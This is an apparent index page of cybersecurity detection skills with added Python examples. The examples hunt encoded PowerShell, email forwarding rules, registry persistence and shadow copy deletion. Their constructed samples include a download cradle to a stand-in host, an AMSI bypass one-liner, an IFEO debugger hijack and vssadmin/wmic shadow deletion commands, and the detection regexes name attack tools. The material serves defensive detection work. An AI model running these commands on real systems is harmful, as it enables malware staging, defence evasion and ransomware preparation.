mitre-attack
62 indexed skills · max 10 per page
detecting-suspicious-powershell-execution
mukul975/Anthropic-Cybersecurity-Skills · detecting-suspicious-powershell-execution
Detect suspicious PowerShell execution patterns including encoded commands, download cradles, AMSI bypass attempts, and constrained language mode evasion.
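The four patterns this skill names can be checked from a single process-creation command line. The example below is added here to show how and is not code from the skill or from the repository: it decodes a `-EncodedCommand` payload (UTF-16LE inside base64) and then runs indicator regexes over both the raw line and the decoded script. The command lines, the `stage.invalid` host and the indicator set are constructed for the example.

```python
"""Flag suspicious PowerShell command lines: -EncodedCommand payloads, download
cradles, AMSI bypass strings and constrained language mode (CLM) evasion.

Added illustration, not code from the indexed skill. Every command line below is
constructed; the regexes are a starting point, not a complete signature set.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Hypothetical stage-2 URL, used only inside the constructed samples.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('http://stage.invalid/a.ps1')"


def encode_powershell(script: str) -> str:
    """Build the base64 PowerShell expects after -EncodedCommand (UTF-16LE bytes)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples in the shape of a Sysmon Event ID 1 / 4688 CommandLine field.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -nop -w hidden -enc " + encode_powershell(STAGE2),
    "powershell.exe -c \"[Ref].Assembly.GetType('System.Management.Automation."
    "AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)\"",
    "powershell.exe -version 2 -ExecutionPolicy Bypass -File C:\\Users\\Public\\x.ps1",
    "powershell.exe -NoProfile -Command Get-Service -Name Spooler",
]

# -EncodedCommand and the abbreviations PowerShell accepts for it (-e, -ec, -en, -enc).
ENCODED_RE = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

INDICATORS = {
    # a fetch primitive and Invoke-Expression/IEX on the same line, in either order
    "download_cradle": re.compile(
        r"(?i)(?:Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|"
        r"Invoke-RestMethod|\birm\b|\bcurl\b|\bwget\b).*(?:Invoke-Expression|\biex\b)"
        r"|(?:Invoke-Expression|\biex\b).*(?:Net\.WebClient|DownloadString|DownloadFile|"
        r"Invoke-WebRequest|\biwr\b|Invoke-RestMethod|\birm\b|\bcurl\b|\bwget\b)"),
    "amsi_bypass": re.compile(r"(?i)AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsiContext"),
    # engine downgrade to v2 and direct LanguageMode tampering both sidestep CLM
    "clm_evasion": re.compile(
        r"(?i)(?:^|\s)-v(?:ersion)?\s+2(?:\.0)?\b|LanguageMode\s*=\s*.FullLanguage"),
    "hidden_window": re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden"),
}


@dataclass
class Finding:
    command_line: str
    decoded_script: Optional[str] = None
    indicators: List[str] = field(default_factory=list)


def analyze(command_line: str) -> Finding:
    """Decode -EncodedCommand if present, then match indicators against the raw
    command line and the decoded script together."""
    finding = Finding(command_line)
    m = ENCODED_RE.search(command_line)
    if m:
        finding.indicators.append("encoded_command")
        try:
            raw = base64.b64decode(m.group(1), validate=True)
            finding.decoded_script = raw.decode("utf-16-le")
        except (ValueError, UnicodeDecodeError):
            # truncated or garbage payload: keep the hit, it still warrants a look
            finding.indicators.append("undecodable_payload")
    haystack = command_line + "\n" + (finding.decoded_script or "")
    for name, pattern in INDICATORS.items():
        if pattern.search(haystack):
            finding.indicators.append(name)
    return finding


def scan(command_lines) -> List[Finding]:
    """Return only the command lines that carry at least one indicator."""
    return [f for f in (analyze(c) for c in command_lines) if f.indicators]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f.indicators, "->", (f.decoded_script or f.command_line)[:80])
```

Decoding before matching is the point: a cradle hidden behind `-enc` never shows up in a plain command-line search. Script block logging (Event ID 4104) gives the same visibility without the decode step, but only where it is enabled, so the decode is worth keeping in the process-creation path as well.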
tracking-threat-actor-infrastructure
mukul975/Anthropic-Cybersecurity-Skills · tracking-threat-actor-infrastructure
Threat actor infrastructure tracking involves monitoring and mapping adversary-controlled assets including command-and-control (C2) servers, phishing domains, exploit kit hosts, bulletproof hosting, a
implementing-threat-modeling-with-mitre-attack
mukul975/Anthropic-Cybersecurity-Skills · implementing-threat-modeling-with-mitre-attack
Implements threat modeling using the MITRE ATT&CK framework to map adversary TTPs against organizational assets, assess detection coverage gaps, and prioritize defensive investments. Use when SOC teams need to align detection engineering with threat landscape, conduct threat assessments for new environments, or justify security tool procurement.
hunting-for-spearphishing-indicators
mukul975/Anthropic-Cybersecurity-Skills · hunting-for-spearphishing-indicators
Hunt for spearphishing campaign indicators across email logs, endpoint telemetry, and network data to detect targeted email attacks.
hunting-for-registry-persistence-mechanisms
mukul975/Anthropic-Cybersecurity-Skills · hunting-for-registry-persistence-mechanisms
Hunt for registry-based persistence mechanisms including Run keys, Winlogon modifications, IFEO injection, and COM hijacking in Windows environments.
hunting-for-shadow-copy-deletion
mukul975/Anthropic-Cybersecurity-Skills · hunting-for-shadow-copy-deletion
Hunt for Volume Shadow Copy deletion activity that indicates ransomware preparation or anti-forensics by monitoring vssadmin, wmic, and PowerShell shadow copy commands.
detecting-email-forwarding-rules-attack
mukul975/Anthropic-Cybersecurity-Skills · detecting-email-forwarding-rules-attack
Detect malicious email forwarding rules created by adversaries to maintain persistent access to email communications for intelligence collection and BEC attacks.
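A forwarding rule shows up in the tenant audit trail as a cmdlet invocation with its parameters, so the hunt is a matter of pulling recipient addresses out of the right parameters and comparing their domains with the tenant's own. The example below is added to illustrate that and is not code from the skill or the repository: the records are constructed to resemble Microsoft 365 unified audit log entries for Exchange (an `Operation` plus a `Parameters` list of Name/Value pairs) with only the fields used here, and the domain `corp.example`, the addresses and the client IPs are made up.

```python
"""Flag mailbox forwarding set up through inbox rules or mailbox settings, the
persistence used for mailbox surveillance and BEC.

Added illustration, not code from the indexed skill. The records are constructed
to resemble Microsoft 365 unified audit log entries for Exchange and only carry
the fields used here; the internal domain and every address are made up.
"""
import re
from typing import Dict, List, Optional, Set

INTERNAL_DOMAINS = {"corp.example"}          # hypothetical tenant domains

# Cmdlets that can create or change forwarding, and the parameters that name recipients.
FORWARDING_OPERATIONS = {"New-InboxRule", "Set-InboxRule", "Set-Mailbox",
                         "New-TransportRule", "Set-TransportRule"}
RECIPIENT_PARAMETERS = {"ForwardTo", "ForwardAsAttachmentTo", "RedirectTo",
                        "ForwardingSmtpAddress", "ForwardingAddress", "BlindCopyTo"}
# Tolerates the "smtp:addr" and "[SMTP:addr]" spellings the log uses for recipients.
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")

SAMPLE_RECORDS = [  # constructed
    {"CreationTime": "2024-05-02T03:14:07", "Operation": "New-InboxRule",
     "UserId": "alice@corp.example", "ClientIP": "203.0.113.9",
     "Parameters": [{"Name": "Name", "Value": "."},
                    {"Name": "ForwardTo", "Value": "drop@mail-example.invalid"},
                    {"Name": "DeleteMessage", "Value": "True"}]},
    {"CreationTime": "2024-05-02T03:20:41", "Operation": "Set-Mailbox",
     "UserId": "alice@corp.example", "ClientIP": "203.0.113.9",
     "Parameters": [{"Name": "Identity", "Value": "alice"},
                    {"Name": "ForwardingSmtpAddress", "Value": "smtp:drop@mail-example.invalid"},
                    {"Name": "DeliverToMailboxAndForward", "Value": "True"}]},
    {"CreationTime": "2024-05-02T09:01:12", "Operation": "New-InboxRule",
     "UserId": "bob@corp.example", "ClientIP": "198.51.100.20",
     "Parameters": [{"Name": "Name", "Value": "Cover while on leave"},
                    {"Name": "ForwardTo", "Value": "carol@corp.example"}]},
    {"CreationTime": "2024-05-02T09:05:55", "Operation": "MailItemsAccessed",
     "UserId": "bob@corp.example", "ClientIP": "198.51.100.20", "Parameters": []},
]


def analyze_record(record: Dict, internal_domains: Set[str]) -> Optional[Dict]:
    """Return a finding when the record sets up forwarding to an external address."""
    if record.get("Operation") not in FORWARDING_OPERATIONS:
        return None
    params = {p["Name"]: str(p.get("Value", "")) for p in record.get("Parameters", [])}
    recipients = set()
    for name in sorted(params.keys() & RECIPIENT_PARAMETERS):
        recipients.update(EMAIL_RE.findall(params[name]))
    external = sorted(r for r in recipients
                      if r.rsplit("@", 1)[1].lower() not in internal_domains)
    if not external:
        return None     # internal forward, or a change that names no recipient
    reasons = ["external_forward"]
    hides = (params.get("DeleteMessage", "").lower() == "true"
             or params.get("MarkAsRead", "").lower() == "true"
             or bool(params.get("MoveToFolder")))
    if hides:
        reasons.append("hides_forwarded_mail")   # the victim never sees the copy
    rule_name = params.get("Name", "")
    if rule_name and (len(rule_name) <= 2 or not any(c.isalnum() for c in rule_name)):
        reasons.append("suspicious_rule_name")   # ".", "..", "," are typical of BEC rules
    return {"time": record.get("CreationTime"), "user": record.get("UserId"),
            "operation": record["Operation"], "client_ip": record.get("ClientIP"),
            "external_recipients": external, "reasons": reasons}


def hunt(records, internal_domains=INTERNAL_DOMAINS) -> List[Dict]:
    return [f for f in (analyze_record(r, internal_domains) for r in records) if f]


if __name__ == "__main__":
    for finding in hunt(SAMPLE_RECORDS):
        print(finding)
```

Two things are easy to miss in a real tenant: forwarding configured by the Outlook client arrives as `UpdateInboxRules` with the rule body in a different field than the one parsed here, and the mailbox-level `Set-Mailbox` path is invisible to anyone who only reviews inbox rules, which is why both cmdlets are in the set above.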
collecting-threat-intelligence-with-misp
mukul975/Anthropic-Cybersecurity-Skills · collecting-threat-intelligence-with-misp
MISP (Malware Information Sharing Platform) is an open-source threat intelligence platform for gathering, sharing, storing, and correlating Indicators of Compromise (IOCs) of targeted attacks, threat
hunting-for-registry-run-key-persistence
mukul975/Anthropic-Cybersecurity-Skills · hunting-for-registry-run-key-persistence
Detect MITRE ATT&CK T1547.001 registry Run key persistence by analyzing Sysmon Event ID 13 logs and registry queries to identify malicious auto-start entries.
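The registry locations listed under hunting-for-registry-persistence-mechanisms (Run keys, Winlogon, IFEO, COM hijacking) and the Sysmon Event ID 13 approach of this entry come together in one hunt: classify each value-set event by the key it touches, then score the written value. The example below is added for that purpose and is not code from either skill or from the repository. Its events are constructed to look like Sysmon's EventData fields; the SIDs, paths and the CLSID are made up, and the default Winlogon values it compares against are the stock `Userinit` and `Shell` entries.

```python
"""Hunt Sysmon Event ID 13 (RegistryEvent: value set) records for four
persistence locations: Run/RunOnce keys (T1547.001), Winlogon helpers
(T1547.004), Image File Execution Options (T1546.012) and user-hive COM
hijacks (T1546.015).

Added illustration, not code from the indexed skills. The events are constructed
to look like Sysmon EventData; the SIDs, paths and CLSID are made up.
"""
import re
from typing import Dict, List, Optional

SAMPLE_EVENTS = [  # constructed Sysmon EID 13 records, only the fields the hunt needs
    {"EventID": 13, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "Details": "powershell.exe -w hidden -enc SQBFAFgA"},
    {"EventID": 13, "Image": r"C:\Users\Public\setup.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",
     "Details": r"C:\Windows\system32\userinit.exe,C:\Users\Public\svc.exe"},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger",
     "Details": "cmd.exe"},
    {"EventID": 13, "Image": r"C:\Users\alice\AppData\Local\Temp\inst.exe",
     "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\CLSID\{11111111-2222-3333-4444-555555555555}\InprocServer32\(Default)",
     "Details": r"C:\Users\alice\AppData\Roaming\upd\shell.dll"},
    {"EventID": 13, "Image": r"C:\Windows\System32\msiexec.exe",
     "TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\VendorAgent",
     "Details": r'"C:\Program Files\Vendor\agent.exe" /background'},
    {"EventID": 13, "Image": r"C:\Windows\System32\services.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Services\Spooler\Start",
     "Details": "DWORD (0x00000002)"},
]

# (ATT&CK technique, category, key pattern) in the order they are tried.
KEY_PATTERNS = [
    ("T1547.001", "run_key", re.compile(
        r"\\CurrentVersion\\(?:Run|RunOnce|RunOnceEx|RunServices|RunServicesOnce)\\", re.I)),
    ("T1547.004", "winlogon", re.compile(
        r"\\Winlogon\\(?:Userinit|Shell|Notify|AppSetup|Taskman)", re.I)),
    ("T1546.012", "ifeo", re.compile(
        r"\\Image File Execution Options\\[^\\]+\\(?:Debugger|GlobalFlag)$"
        r"|\\SilentProcessExit\\[^\\]+\\MonitorProcess$", re.I)),
    ("T1546.015", "com_hijack", re.compile(
        r"^HKU\\.*\\Software\\Classes\\CLSID\\\{[0-9A-F-]+\}\\(?:InprocServer32|LocalServer32|TreatAs)", re.I)),
]

# Signals scored on the value that was written (and on the writing process's path).
VALUE_SIGNALS = {
    "script_or_lolbin": re.compile(
        r"powershell|pwsh|mshta|wscript|cscript|rundll32|regsvr32|cmd\.exe|cmd /c|certutil|bitsadmin", re.I),
    "user_writable_path": re.compile(r"\\(?:Users|AppData|Temp|ProgramData|Public)\\", re.I),
    "encoded_or_hidden": re.compile(
        r"-enc|-e\s+[A-Za-z0-9+/=]{16,}|-w(?:indowstyle)?\s+hidden|-nop\b", re.I),
}
# What these Winlogon values hold on a stock install; anything else is a helper.
WINLOGON_DEFAULTS = {"userinit": r"c:\windows\system32\userinit.exe,", "shell": "explorer.exe"}


def classify(event: Dict) -> Optional[Dict]:
    """Return a hit record for an EID 13 write to a persistence location, else None."""
    if event.get("EventID") != 13:
        return None
    target = event.get("TargetObject", "")
    details = str(event.get("Details", ""))
    image = event.get("Image", "")
    for technique, category, pattern in KEY_PATTERNS:
        if pattern.search(target):
            break
    else:
        return None
    reasons = [name for name, sig in VALUE_SIGNALS.items() if sig.search(details)]
    if VALUE_SIGNALS["user_writable_path"].search(image):
        reasons.append("writer_in_user_path")
    value_name = target.rsplit("\\", 1)[-1].lower()
    if category == "winlogon" and details.lower() != WINLOGON_DEFAULTS.get(value_name):
        reasons.append("winlogon_nondefault")
    if category == "ifeo" and value_name == "debugger":
        reasons.append("ifeo_debugger_set")       # rarely legitimate outside developer boxes
    if category == "com_hijack":
        reasons.append("user_hive_com_override")  # HKCU CLSID shadows the HKLM registration
    return {"technique": technique, "category": category, "target": target,
            "details": details, "image": image, "reasons": reasons, "score": len(reasons)}


def hunt(events, min_score: int = 0) -> List[Dict]:
    """All persistence-location writes, optionally only those with min_score signals."""
    hits = [h for h in (classify(e) for e in events) if h is not None]
    return [h for h in hits if h["score"] >= min_score]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS, min_score=1):
        print(hit["technique"], hit["reasons"], hit["target"])
```

Keeping zero-score hits (the vendor agent written by `msiexec.exe` above) is deliberate: a baseline of every Run-key write is what lets you tell a new autostart from a known one, and the score only decides what rises to an alert.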
building-detection-rules-with-sigma
mukul975/Anthropic-Cybersecurity-Skills · building-detection-rules-with-sigma
Builds vendor-agnostic detection rules using the Sigma rule format for threat detection across SIEM platforms including Splunk, Elastic, and Microsoft Sentinel. Use when creating portable detection logic from threat intelligence, mapping rules to MITRE ATT&CK techniques, or converting community Sigma rules into platform-specific queries using sigmac or pySigma backends.
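The shadow copy deletion hunt from hunting-for-shadow-copy-deletion (vssadmin, wmic and PowerShell variants) is a natural case for a Sigma rule, and seeing such a rule evaluated against events shows what the `contains`/`endswith` modifiers and the `1 of sel_*` condition actually mean. The example below is added for both entries and is neither code from the skills or repository nor pySigma: it implements only the subset of Sigma semantics this rule needs (case-insensitive `contains`/`startswith`/`endswith`, the `all` modifier, `and`/`or`/`not`, parentheses, and `1 of`/`all of` with name wildcards), with no wildcard or regex value matching. The rule is written as a Python dict with the structure a Sigma YAML file has; the `backup-agent.exe` filter and all events are constructed.

```python
"""Minimal Sigma-style rule evaluation over constructed process-creation events,
with a shadow copy deletion rule as the worked case.

Added illustration, not code from the indexed skills and not pySigma. Only the
subset of Sigma semantics used by this rule is implemented. Real rules should be
converted with pySigma (or the legacy sigmac) into the target SIEM's language.
"""
import fnmatch
import re
from typing import Dict, List

SHADOW_COPY_RULE = {  # same structure as a Sigma YAML file, expressed as a dict
    "title": "Shadow Copy Deletion via vssadmin, wmic or PowerShell",
    "status": "experimental",
    "logsource": {"category": "process_creation", "product": "windows"},
    "detection": {
        "sel_vssadmin": {"Image|endswith": "\\vssadmin.exe",
                         "CommandLine|contains|all": ["delete", "shadows"]},
        "sel_wmic": {"Image|endswith": "\\wmic.exe",
                     "CommandLine|contains|all": ["shadowcopy", "delete"]},
        "sel_powershell": {"Image|endswith": ["\\powershell.exe", "\\pwsh.exe"],
                           "CommandLine|contains|all": ["Win32_ShadowCopy", "Delete"]},
        # hypothetical backup product that legitimately prunes shadow copies
        "filter_backup": {"ParentImage|endswith": "\\backup-agent.exe"},
        "condition": "1 of sel_* and not filter_backup",
    },
    "falsepositives": ["Backup software that manages shadow copies"],
    "level": "high",
    "tags": ["attack.impact", "attack.t1490"],
}

EVENTS = [  # constructed process-creation events
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin.exe delete shadows /all /quiet"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe", "ParentImage": r"C:\Users\Public\invoice.exe",
     "CommandLine": "wmic shadowcopy delete"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell -c "Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_.Delete() }"'},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Program Files\Acme\backup-agent.exe",
     "CommandLine": "vssadmin delete shadows /for=C: /oldest"},
    {"Image": r"C:\Windows\System32\vssadmin.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "vssadmin list shadows"},
]


def _match_value(actual, modifiers: List[str], pattern) -> bool:
    a, p = ("" if actual is None else str(actual)).lower(), str(pattern).lower()
    if "contains" in modifiers:
        return p in a
    if "startswith" in modifiers:
        return a.startswith(p)
    if "endswith" in modifiers:
        return a.endswith(p)
    return a == p


def match_selection(selection, event: Dict) -> bool:
    """A map is AND across its keys; a value list is OR unless `all`; a list of maps is OR."""
    if isinstance(selection, list):
        return any(match_selection(s, event) for s in selection)
    for key, patterns in selection.items():
        field, *modifiers = key.split("|")
        values = patterns if isinstance(patterns, list) else [patterns]
        results = [_match_value(event.get(field), modifiers, v) for v in values]
        if not (all(results) if "all" in modifiers else any(results)):
            return False
    return True


def evaluate_condition(condition: str, detection: Dict, event: Dict) -> bool:
    """Recursive descent over the condition: `not` binds tightest, then `and`, then `or`."""
    tokens = re.findall(r"\(|\)|[^\s()]+", condition)
    names = [n for n in detection if n != "condition"]
    pos = 0

    def primary() -> bool:
        nonlocal pos
        tok = tokens[pos]
        pos += 1
        if tok == "(":
            value = expr()
            pos += 1                                  # consume ")"
            return value
        if tok == "not":
            return not primary()
        if tok in ("1", "all") and tokens[pos] == "of":
            pattern = tokens[pos + 1]
            pos += 2
            chosen = names if pattern == "them" else fnmatch.filter(names, pattern)
            hits = [match_selection(detection[n], event) for n in chosen]
            return all(hits) if tok == "all" else any(hits)
        return match_selection(detection[tok], event)

    def term() -> bool:
        nonlocal pos
        value = primary()
        while pos < len(tokens) and tokens[pos] == "and":
            pos += 1
            value = primary() and value               # evaluate the operand before combining
        return value

    def expr() -> bool:
        nonlocal pos
        value = term()
        while pos < len(tokens) and tokens[pos] == "or":
            pos += 1
            value = term() or value
        return value

    return expr()


def match_rule(rule: Dict, event: Dict) -> bool:
    detection = rule["detection"]
    return evaluate_condition(detection["condition"], detection, event)


def matching_events(rule: Dict, events: List[Dict]) -> List[int]:
    return [i for i, e in enumerate(events) if match_rule(rule, e)]


if __name__ == "__main__":
    print(SHADOW_COPY_RULE["title"], "->", matching_events(SHADOW_COPY_RULE, EVENTS))
```

The filter is the part to get right: excluding by `ParentImage` name alone is weak, since anything can be launched from a copied binary of that name, so a production rule would pin the filter to the agent's installed path or signer and keep the `list shadows` enumeration out of scope as this one does.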